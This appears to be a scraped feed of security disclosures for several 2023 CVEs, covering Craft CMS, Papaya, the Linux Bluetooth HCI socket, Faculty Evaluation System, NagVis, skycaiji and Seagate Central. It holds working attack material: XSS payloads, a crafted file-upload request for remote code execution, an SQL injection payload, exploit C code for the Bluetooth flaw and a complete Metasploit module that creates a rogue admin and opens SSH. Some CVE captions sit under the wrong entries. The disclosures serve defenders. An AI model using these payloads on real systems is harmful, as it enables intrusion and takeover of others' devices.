Craft is a CMS for creating custom digital experiences. Cross site scripting (XSS) can be triggered by review volumes. This issue has been fixed in version 4.4.7.



**Summary**

XSS can be triggered by review volumes

**PoC**

    1. Access setting tab
    2. Create new assets
    3. In assets name inject payload: "<script>alert(1337)</script>
    4. Click Utilities tab
    5. Choose all volumes, or volume trigger xss
    6. Click Update asset indexes.
    7. Wait to assets update success.
    8. Progress complete.
    9. Click on review button will trigger XSS
    

**Root cause**

Function: index.php?p=admin/actions/asset-indexes/process-indexing-session&v=1680710595770  
After loading completed, progess will load:  
"skippedEntries"  
and  
"missingEntries"  
These parameters is not yet filtered, I just tried "skippedEntries" but I think it will be work with "missingEntries"

**My reponse:**

{  
"session": {  
"id": 10,  
"indexedVolumes": {  
"6": ""<script>alert(1337)</script>"  
},  
"totalEntries": 2235,  
"processedEntries": 2235,  
"cacheRemoteImages": true,  
"listEmptyFolders": false,  
"isCli": false,  
"actionRequired": true,  
"dateCreated": "Apr 5, 2023, 9:03:16 AM",  
"skippedEntries": \[  
""<script>alert(1337)</script>/assetpreviews/Image.php",  
""<script>alert(1337)</script>/assetpreviews/Pdf.php"  
\],  
"missingEntries": {  
"folders": \[\],  
"files": \[\]  
},  
"processIfRootEmpty": false  
},  
"skipDialog": false  
}

Resolved in 053d711

CVE-2023-33196: Stored XSS in review volumne

An issue was discovered in Papaya Viewer 4a42701. User-supplied input in form of DICOM or NIFTI images can be loaded into the Papaya web application without any kind of sanitization. This allows injection of arbitrary JavaScript code into image metadata, which is executed when that metadata is displayed in the Papaya web application

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Title ===== SCHUTZWERK-SA-2022-001: Cross-Site-Scripting in Papaya Medical Viewer Status ====== PUBLISHED Version ======= 1.0 CVE reference ============= CVE-2023-33255 Link ==== https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-001/ Text-only version: https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-001.txt Further SCHUTZWERK advisories: https://www.schutzwerk.com/blog/tags/advisories/ Affected products/vendor ======================== Papaya, Research Imaging Institute - University of Texas Health Science Center Summary ======= User supplied input in the form of DICOM or NIFTI images can be loaded into the Papaya web application without any kind of sanitization. This allows to inject arbitrary JavaScript code into the image's metadata which will in consequence be executed as soon as the metadata is displayed in the Papaya web application. Risk ==== The vulnerability allows an attacker to inject arbitrary JavaScript code into the Papaya web application. A risk calculation highly depends on how the Papaya software is used as a library in the context of a bigger medical web application. During the discovery of this vulnerability, the web application which used Papaya allowed to upload and store corresponding images on the web server and display them to multiple users. It was therefore possible to store JavaScript code on the server and attack users to impersonate or steal their session, leading to a disclosure of sensitive medical data. Description =========== A medical web application assessed for security vulnerabilities by SCHUTZWERK was found to contain a stored cross-site-scripting vulnerability. The application uses the Papaya JavaScript software\[0\] published by the Research Imaging Institute belonging to the University of Texas Health Science Center\[1\]. The software is described as "\[..\] a pure JavaScript medical research image viewer, supporting DICOM and NIFTI formats, compatible across a range of web browsers \[..\]". It can be used stand-alone or integrated into larger medical applications, has 192 forks and 488 stars on GitHub and was used in at least 50 published academic research papers\[2\]. One of the main features is to open medical images of multiple formats, which can be achieved via the context menu "File - Add image...". Papaya then displays the image and adds a new icon in the upper right corner of the viewer. This icon allows to open another context menu to edit the previous opened image as a layer in multiple ways. The option of interest for the cross-site-scripting vulnerability is the "Show Header" entry, which allows getting further information about the medical image. An example DICOM\[3\] zip archive was downloaded\[4\], extracted and opened in Papaya. The "Show Header" function shows multiple entries including private patient data fields like patient ID, name, date of birth and gender. The DICOM ToolKit (DCMTK)\[5\] offers multiple tools to analyze, create and edit DICOM images. The metadata field "Manufacturer" of the previously downloaded DICOM image was edited with help of the DCMTK tool dcmodify: DICTPATH=/tmp/share/dcmtk/dicom.dic dcmodify -m "Manufacturer=" 2\_skull\_ct/DICOM/I0 The DCMTK tool dcmdump can be used to verify the manipulated metadata entry: dcmdump 2\_skull\_ct/DICOM/I0 \[..\] # Dicom-Data-Set \[..\] (0008,0070) LO \[\] # 26, 1 Unknown Tag & Data \[..\] Viewing the header information of the manipulated DICOM image in Papaya executes the injected JavaScript code in the web browser. SCHUTZWERK decided to publish the still existing vulnerability (commit 4a42701), since the vendor did not implement any remediation several months after new contributors have been introduced to the project. Solution/Mitigation =================== Several mitigation recommendations have been sent to the vendor. These include common mitigation strategies from OWASP\[6\], like escaping user controlled input and the usage of popular JavaScript libraries like DomPurify\[7\]. As a quick workaround, the context menu, which allows showing header information can be disabled by setting the variable kioskMode to true. Disclosure timeline =================== 2020-08-20: Vulnerability discovered 2020-08-20: Vulnerability reported to vendor 2020-09-30: Contacted vendor again 2020-09-30: Vendor responds and asks for mitigation ideas 2020-10-01: Response to vendor with detailed information and mitigation ideas 2020-11-09: Contacted vendor again for any status updates 2022-08-30: Retest of the customer application including the Papaya web application 2022-09-21: Notified vendor of intention to publish advisory 2022-10-18: Vendor notified SCHUTZWERK of new contributors who will maintain the project 2023-04-19: Informed vendor about publication deadline on May 15, 2023 2023-05-08: Vendor replied with intention to fix vulnerability until May 15,2023 2023-05-15: Vulnerability fixed by vendor 2023-05-26: Advisory published by SCHUTZWERK Contact/Credits =============== The vulnerability was discovered during an assessment by Lennert Preuth of SCHUTZWERK GmbH. References ========== \[0\] https://github.com/rii-mango/Papaya \[1\] https://rii.uthscsa.edu/ \[2\] http://mangoviewer.com/pubs.html \[3\] https://en.wikipedia.org/wiki/DICOM \[4\] https://medimodel.com/sample-dicom-files/human\_skull\_2\_dicom\_file/ \[5\] https://dicom.offis.de/dcmtk.php.de \[6\] https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_ Prevention\_Cheat\_Sheet.html \[7\] https://github.com/cure53/DOMPurify Disclaimer ========== The information in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website. -----BEGIN PGP SIGNATURE----- iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmRwkEgaHGFkdmlzb3Jp ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvCEA//YsP7ZUvk9VLzp49DtsMP HQF0ojoBmNZOi5fymVDRGScmMT5VLOsdp9EUEywPYxmxo1rPc4vv6gM3hQsQ7TRO oAb9ZeZjvYy2Nyz6cy3wX4H2naFOHEr085Uwpg9pX5DAHkQVsseTi/n04u5PT5xP Fnuozie/KOG4pmkkKFHmG6aWgUSXWZuq8japOghl6g35BmG7ntXG2OYsb7f5ITYw ksRbJt+8wetrBsa/pR6ZfEkoEpyuFZg85EDpDRoBPVlGZtuSF6dh+WfO+9VQBjLE dZwPRaXefHp/v89rEfWvkX3JGmGWh6P8KQ+puF3GHLcBa8iDIbW/HPfQHGuGhfIa upZ1E+HtgpxInxelM/BcFKXSjD4AMnAULa2C6nWsdmw8GIKHHus+WQuK1z40R7N4 Vji59buH9SBWAWb7MuyRrdxoZSmAuxcR7lXVzHMxSOZm0W7J0d9luLL8XUn4kj8+ tRE24TgbdGyAYr/V6BO9RiYCtyWPji5VBtwFZLFlvKRo81zyS9nve651nWS7Fv/l OGns4fGbEZ+sm/YuFdfyzg8TMJ0pqV0AswCnx9mSqWn3RRBHg55pE4i6IyUdofu/ eiaTl33oyGolW7rQ5ATtmsOgKp5jKb7rt3WVSBLn1D9+JJ8MfbDrvyUoTkIZaqEp 4bKAQKWvxQG8GpbKuQT4on0= =IEuk -----END PGP SIGNATURE-----

CVE-2023-33255

A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sun, 16 Apr 2023 18:12:18 +0800
From: Ruihan Li <lrh2000@....edu.cn>
To: oss-security@...ts.openwall.com
Cc: Ruihan Li <lrh2000@....edu.cn>
Subject: CVE-2023-2002: Linux Bluetooth: Unauthorized management command
 execution

Hi,

An insufficient permission check has been found in the Bluetooth subsystem of
the Linux kernel when handling ioctl system calls of HCI sockets. This causes
tasks without the proper CAP\_NET\_ADMIN capability can easily mark HCI sockets
as \_trusted\_. Trusted sockets are intended to enable the sending and receiving
of management commands and events, such as pairing or connecting with a new
device.  As a result, unprivileged users can acquire a trusted socket, leading
to unauthorized execution of management commands. The exploit requires only
the presence of a set of commonly used setuid programs (e.g., su, sudo).

## Cause

The direct cause of the vulnerability is the following code snippet:
\`\`\`c
static int hci\_sock\_ioctl(struct socket \*sock, unsigned int cmd,
                          unsigned long arg)
{
	...
        if (hci\_sock\_gen\_cookie(sk)) {
		...
                if (capable(CAP\_NET\_ADMIN))
                        hci\_sock\_set\_flag(sk, HCI\_SOCK\_TRUSTED);
		...
        }
	...
}
\`\`\`

The implementation of an ioctl system call verifies whether the task invoking
the call has the necessary CAP\_NET\_ADMIN capability to update the
HCI\_SOCK\_TRUSTED flag. However, this check only considers the calling task,
which may not necessarily be the socket opener. For instance, the socket can
be shared with another task using fork and execve, where the latter task may
be privileged, such as a setuid program. Moreover, if the socket is used as
stdout or stderr, an ioctl call is made to obtain tty parameters, which can be
verified through the strace command.
\`\`\`
# strace -e trace=ioctl sudo > /dev/null
ioctl(3, TIOCGPGRP, \[30305\])            = 0
ioctl(2, TIOCGWINSZ, {ws\_row=45, ws\_col=190, ws\_xpixel=0, ws\_ypixel=0}) = 0
\`\`\`

The ioctl calls for tty parameters will never succeed on HCI sockets, but they
are sufficient to mark HCI sockets as trusted. Therefore, an unprivileged
program can hold trusted HCI sockets, enabling it to send and receive
management commands and events, since the trusted flag will never be cleared.

## Exploit

The exploitation can be as easy as below:
\`\`\`c
	int fd = socket(PF\_BLUETOOTH, SOCK\_RAW, BTPROTO\_HCI);

	/\* By executing sudo with an HCI socket as stderr, an ioctl
	 \* system call makes the HCI socket privileged (i.e. with
	 \* the HCI\_SOCK\_TRUSTED flag set).
	 \*/
	int pid = fork();
	if (pid == 0) {
		dup2(fd, 2);
		close(fd);
		execlp("sudo", "sudo");
	}

	waitpid(pid, NULL, 0);

	struct sockaddr\_hci haddr;
	haddr.hci\_family = AF\_BLUETOOTH;
	haddr.hci\_dev = HCI\_DEV\_NONE;
	haddr.hci\_channel = HCI\_CHANNEL\_CONTROL;

	/\* The socket has not been bound. It can be bound to the
	 \* management channel now. After that, the HCI\_SOCK\_TRUSTED
	 \* flag is still present, as it will indeed never be cleared.
	 \*/
	bind(fd, (struct sockaddr \*)&haddr, sizeof(haddr));
\`\`\`

Furthermore, btmon can be used to confirm that the socket becomes trusted and
successive management commands will succeed:
\`\`\`
# btmon
@ RAW Open: sudo (privileged) version 2.22
@ RAW Close: sudo
@ MGMT Open: sudo (privileged) version 1.22
@ MGMT Command: Set Powered (0x0005) plen 1
        Powered: Disabled (0x00)
@ MGMT Event: Command Complete (0x0001) plen 7
      Set Powered (0x0005) plen 4
        Status: Success (0x00)
\`\`\`

A full PoC exploit to change the power state of Bluetooth devices can be found
\[on GitHub\]\[exp\].

\[exp\]: https://github.com/lrh2000/CVE-2023-2002/tree/master/exp

## Impact

If successfully exploited, the identified vulnerability has the potential to
compromise the confidentiality, integrity, and availability of Bluetooth
communication. Attackers can exploit this vulnerability to pair the controller
with malicious devices, even if the Bluetooth service is disabled or not
installed. It is also possible to prevent specific devices from being paired,
or read some sensitive information such as the OOB data.

## Affection

The exploitable vulnerability has been present in the Linux kernel since v4.9.
More specifically, it becomes exploitable after the \[commit f81f5b2db869\]\[cm\]
("Bluetooth: Send control open and close messages for HCI raw sockets"). Prior
to this commit, exploiting the vulnerability required tricking a privileged
program into binding an HCI socket, which is very hard (if not impossible) to
trigger in practice. However, after the commit, it requires only tricking a
privileged program to invoke an ioctl system call, which relies only on the
existence of an setuid program, as illustrated above.

\[cm\]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f81f5b2db869

The exploitation works as long as there are setuid programs (or more
precisely, programs with the CAP\_NET\_ADMIN capability) that invokes ioctl
calls on stdin, stdout, or stderr. In most Linux distros, a quick (but very
coarse) test reveals that quite a few setuid programs are using ioctl system
calls, which are marked with 'V' in the table below:
\`\`\`
# find . -user root -perm -4000 -exec sh -c "strace -e trace=ioctl {} < /dev/null 2>&1 > /dev/null | grep ioctl > /dev/null && echo -n 'V ' || echo -n 'S '; echo {};" \\; | sort
S ./chage
S ./expiry
S ./fusermount
S ./fusermount3
S ./gpasswd
S ./ksu
S ./mount.cifs
S ./sg
S ./umount
V ./chfn
V ./chsh
V ./mount
V ./newgrp
V ./passwd
V ./pkexec
V ./screen-4.9.0
V ./su
V ./sudo
V ./unix\_chkpwd
\`\`\`
After manually checking the strace output, it is found that all of these ioctl
users are using ioctl calls on stdin, stdout, or stderr to get or set some tty
parameters. Note that exactly no arguments are passed to these setuid
programs. If some crafted arguments are passed, the number of ioctl users may
increase. As a result, a number of linux distros can be vulnerable to the
exploitation.

As a side note, Android devices, however, are unlikely to be affected since
the exploitation requires the existence of setuid programs, which Android has
\[avoided using\]\[su\] for some time. Besides, there are also no applications
with the CAP\_NET\_ADMIN capability on Android.

\[su\]: https://source.android.com/docs/security/enhancements/enhancements43

## Mitigation

\[A patch\]\[fi\] has been posted to the linux-bluetooth mailing list which fixes
this vulnerability by replacing capable() with sk\_capable(), where
sk\_capable() checks not only the current task but also that the socket opener
has the required capability. At the same time, \[another submitted patch\]\[se\]
hardens the ioctl processing logic by checking command validity at the start
of hci\_sock\_ioctl() and returning with an ENOIOCTLCMD error code immediately
before doing anything if the command is invalid.

\[fi\]: https://lore.kernel.org/linux-bluetooth/20230416081404.8227-1-lrh2000@pku.edu.cn
\[se\]: https://lore.kernel.org/linux-bluetooth/20230416080251.7717-1-lrh2000@pku.edu.cn

As a workaround, if the Bluetooth devices are not being used at all (but it is
not feasible to physically remove the device), it is possible to simply block
the devices using rfkill, which will prevent the devices from being powered
up. By doing so, sending management commands to power up Bluetooth devices
won't succeed. This can significantly reduce the impact of this vulnerability.

There are two ways to avoid similar vulnerabilities in the future: hardening
the Linux kernel and hardening userspace setuid programs.
 - There are many uses of capable() in the Linux kernel that check the
   capability of the current task, but do nothing about the file or socket
   opener. In many cases, it may be reasonable to also check the capability of
   the opener. However, adding more capability checks can lead to unexpected
   regressions, although no such examples in reality have been seen at the
   time of writing.
 - Stdin, stdout, and stderr are different from other file descriptors,
   because they are inherited from the parent task but are used directly by
   the current task. For privileged setuid programs, inherited file
   descriptors may need to be treated as untrusted. Therefore, it also seems
   reasonable to explicitly drop privileges when invoking system calls on
   these untrusted file descriptors.

## Relation

This vulnerability shares exactly the same principle as \[CVE-2014-0181\]\[c14\]. In
the case of CVE-2014-0181, the issue was the lack of a mechanism to authorize
Netlink operations based on the opener of the socket, which allows local users
to modify network configurations by using a Netlink socket for the stdout or
stderr of a setuid program.

\[c14\]: https://nvd.nist.gov/vuln/detail/CVE-2014-0181

## Timeline

\*\*2023-04-04:\*\* I discovered this vulnerability during my audit of the
Bluetooth protocol stack in the Linux kernel.

\*\*2023-04-09:\*\* I have reported this vulnerability to the Linux kernel
security team and distribution vendors, with an initial version of patches.

\*\*2023-04-12:\*\* This vulnerability has been assigned a CVE ID, which is
CVE-2023-2002.

\*\*2023-04-13:\*\* After several days of discussion with the maintainers, the
patches have been updated accordingly.

\*\*2023-04-16:\*\* The vulnerability was disclosed on the public oss-security
mailing list (here) and \[on GitHub\]\[gh\]. Two patches have been posted to the
public linux-bluetooth mailing list (\[first\]\[fi\], \[second\]\[se\]).

\[gh\]: https://github.com/lrh2000/CVE-2023-2002

Thanks,
Ruihan Li

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-2002: security - CVE-2023-2002: Linux Bluetooth: Unauthorized management command execution

A lateral privilege escalation vulnerability in XXL-Job v2.4.1 allows users to execute arbitrary commands on another user's account via a crafted POST request to the component /jobinfo/.

CVE-2023-33779: GitHub - xuxueli/xxl-job: A distributed task scheduling framework.（分布式任务调度平台XXL-JOB）

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin@admin.com/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=save\_user

Loophole location: Faculty Evaluation System's "/eval/ajax.php?action=save\_user" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /eval/ajax.php?action\=save\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/eval/index.php?page=edit\_user&id=1
Content-Length: 818
Content-Type: multipart/form-data; boundary=---------------------------1037163726497
Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r
Connection: close
\-----------------------------1037163726497
Content-Disposition: form-data; name="id"
1
\-----------------------------1037163726497
Content-Disposition: form-data; name="firstname"
Administrator
\-----------------------------1037163726497
Content-Disposition: form-data; name="lastname"
a
\-----------------------------1037163726497
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------1037163726497
Content-Disposition: form-data; name="email"
admin@admin.com
\-----------------------------1037163726497
Content-Disposition: form-data; name="password"
\-----------------------------1037163726497
Content-Disposition: form-data; name="cpass"
\-----------------------------1037163726497--

The uploaded file path has returned in response.

The files will be uploaded to this directory \\eval\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_task.php?id=

Vulnerability location: /eval/admin/manage\_task.php?id=, id

Vulnerability sql: $qry = $conn->query("SELECT * FROM task_list where id = ".$_GET['id'])->fetch_array();

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_task.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-33439: bug_report/SQLi-1.md at main · F14me7wq/bug_report

Nagvis before 1.9.34 was discovered to contain an arbitrary file read vulnerability via the component /core/classes/NagVisHoverUrl.php.

**Commits on Aug 29, 2022**

4.  Fix type juggling vulnerability
    
    PHP evaluates \`!=\` a bit loose on the type. So "0000" == "0e5678" is
    true in PHP. An attacker could send a zeroed cookie\_hash \`"0"\*32\` and
    only need an collision with a calculated hash beginning with \`0e\`
    followed by only numbers.
    
    In our tests (with auth.secret set to \`stable\`) a valid cookie is
    \`cmkadmin:58191275:00000000000000000000000000000000\`.
    
    For a remote attacker this would have needed 58,191,275 guesses.
    
    Maximilian Wirtz authored and LarsMichelsen committed
    
    Aug 29, 2022
    
5.  Mitigate arbitrary file read
    
    With this change the URL is restricted to http and https. So no local
    files can be read. This still is a Server-side request forgery (SSRF).
    
    Maximilian Wirtz authored and LarsMichelsen committed
    
    Aug 29, 2022

CVE-2022-46945: Comparing nagvis-1.9.33...nagvis-1.9.34 · NagVis/nagvis

skycaiji v2.5.4 is vulnerable to Cross Site Scripting (XSS). Attackers can achieve backend XSS by deploying malicious JSON data.

Firstly, you can download the source code from the following website

https://down.chinaz.com/api/index/download?id=38972&type=code

Directly place it in the root directory of the website, access the server IP, and follow the prompts to install

After installation, log in to the backend.

Click to the above function point

This is a JSON parsing function, but there is no complete xss protection in place.

We can construct a file that returns the JSON format ourselves, then access it, and return it to the JSON format with xss to trigger the xss code in the background.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  

<?php  
$data = array(  
    'name' => 'John  <img src=\\'x\\' onerror=\\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\\">',  
    'age' => 30,  
    'email' => 'johndoe@example.com',  
);  
   
$json = json\_encode($data);  
   
header('Content-type: application/json');  
echo $json;  

This string of code will return a JSON data with malicious payload.

We will deploy it on our own VPS and induce the backend administrator to parse its data, and we will find that the successful triggering of the xss code

Attackers can use this vulnerability to do anything that JavaScript code can do

CVE-2023-33394: skycaiji-v2.5.4 has a backend xss vulnerability

This Metasploit module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access.

    ### Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)# Date: Dec 9 2019# Exploit Author: Ege Balci# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/# Version: 2015.0916# CVE : 2020-6627# This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/http'require 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::SSH  def initialize(info={})    super(update_info(info,      'Name'           => "Seagate Central External NAS Arbitrary User Creation",      'Description'    => %q{        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state        and register a new admin user which is capable of SSH access.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Ege Balcı <egebalci@pm.me>' # author & msf module        ],      'References'     =>        [          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],          ['CVE', '2020-6627']        ],      'DefaultOptions'  =>        {          'SSL' => false,          'WfsDelay' => 5,        },      'Platform'       => ['unix'],      'Arch'           => [ARCH_CMD],      'Payload'        =>      {        'Compat' => {          'PayloadType'    => 'cmd_interact',          'ConnectionType' => 'find'        }      },      'Targets'        =>        [          ['Auto',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD            }          ],        ],      'Privileged'     => true,      'DisclosureDate' => "Dec 9 2019",      'DefaultTarget'  => 0    ))    register_options(      [        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])      ], self.class    )    register_advanced_options(      [        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])      ]    )  end  def check    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')      Exploit::CheckCode::Appears    else      Exploit::CheckCode::Safe    end  end  def exploit    # First get current state    first_state=get_state()    if first_state      print_status("Current device state: #{first_state['state']}")    else      return    end    if first_state['state'] != 'start'      # Set new start state      first_state['state'] = 'start'      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),        'ctype' => 'application/x-www-form-urlencoded',        'data'  => "info=#{first_state.to_json}"      },60)      changed_state=get_state()      if changed_state && changed_state['state'] == 'start'        print_good("State successfully changed !")      else        print_error("Could not change device state")        return      end    end    name = Rex::Text.rand_name_male    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)    print_status('Creating new admin user...')    print_status("User: #{user}")    print_status("Pass: #{pass}")    # Add new admin user    res = send_request_cgi({      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}    },60)    conn = do_login(user,pass)    if conn      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")      handler(conn.lsock)    end  end  def do_login(user, pass)    factory = ssh_socket_factory    opts = {      :auth_methods    => ['password', 'keyboard-interactive'],      :port            => 22,      :use_agent       => false,      :config          => false,      :password        => pass,      :proxy           => factory,      :non_interactive => true,      :verify_host_key => :never    }    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']    begin      ssh = nil      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        ssh = Net::SSH.start(rhost, user, opts)      end    rescue Rex::ConnectionError      fail_with Failure::Unreachable, 'Connection failed'    rescue Net::SSH::Disconnect, ::EOFError      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"      return    rescue ::Timeout::Error      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"      return    rescue Net::SSH::AuthenticationFailed      print_error "#{rhost}:#{rport} SSH - Failed authentication"    rescue Net::SSH::Exception => e      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"      return    end    if ssh      conn = Net::SSH::CommandStream.new(ssh)      ssh = nil      return conn    end    return nil  end  def get_state    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && (res.code == 200 ||res.code == 100)      return res.get_json_document    end    res = nil  endend

Seagate Central Storage 2015.0916 User Creation / Command Execution

Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Tag

#php